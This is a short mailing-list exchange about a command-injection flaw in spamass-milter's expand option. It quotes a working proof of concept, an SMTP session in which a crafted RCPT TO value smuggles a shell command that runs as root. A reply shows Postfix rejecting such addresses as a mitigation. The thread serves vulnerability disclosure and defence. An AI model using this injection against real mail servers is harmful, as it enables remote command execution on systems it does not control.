Ned Slider wrote:
Brian wrote:
The key is this:
"If spamass-milter is run with the expand flag (-x option) it runs a
popen() including the attacker supplied recipient (RCPT TO)."
POC IS
$ nc localhost 25
220 ownthabox ESMTP Postfix (Ubuntu)
mail from: me () me com
250 2.1.0 Ok
rcpt to: root+:"|touch /tmp/foo"
250 2.1.5 Ok
$ ls -la /tmp/foo
-rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo
Easily mitigated, you shouldn't be accepting mail to non-FQDN addresses
mail from: n...@example.com
250 2.1.0 Ok
rcpt to: root+:"|touch /tmp/foo"
504 5.5.2 <root+:|touch /tmp/foo>: Recipient address rejected: need
fully-qualified address
quit
221 2.0.0 Bye
Connection closed by foreign host.
That's Postfix 2.3.3 on RHEL5 BTW :-)
$ rpm -q postfix
postfix-2.3.3-2.1.el5_2.x86_64
